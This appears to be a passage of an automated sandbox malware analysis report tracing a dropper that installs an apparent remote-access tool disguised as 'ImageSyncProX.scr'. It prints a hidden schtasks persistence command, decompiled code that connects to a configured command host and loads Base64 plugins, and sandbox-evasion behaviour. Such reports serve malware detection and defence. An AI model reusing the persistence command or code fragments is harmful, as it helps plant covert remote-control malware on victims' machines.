Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: DA92phBHUS.exe Static file information: File size 3145765 > 1048576
Source: DA92phBHUS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

Data Obfuscation

Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Memory
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: DA92phBHUS.exe Static PE information: real checksum: 0xc6020 should be: 0x3088dd
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E68B75 push ecx; ret 10_2_00E68B88
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00318B75 push ecx; ret 18_2_00318B88
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030CBDB push eax; retf 18_2_0030CBF8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030CC06 push eax; retf 18_2_0030CBF8

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_00EC59B3
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_00E55EDA
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 18_2_003759B3
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00305EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 18_2_00305EDA
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E633B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_00E633B7
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 14E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 2FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Memory allocated: 2F00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Window / User API: threadDelayed 1826
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Window / User API: threadDelayed 713
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Window / User API: threadDelayed 9107
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe TID: 6656 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Thread sleep count: Count: 1826 delay: -10
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA4005
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00EA494A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00EA3CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAC2FF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_00EACD9F
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EACD14 FindFirstFileW,FindClose, 10_2_00EACD14
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF5D8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00EAF735
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_00EAFA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00354005
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035C2FF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose, 18_2_0035494A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD14 FindFirstFileW,FindClose, 18_2_0035CD14
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 18_2_0035CD9F
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F5D8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_0035F735
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 18_2_0035FA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00353CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_00353CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_00E55D13
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\438799\
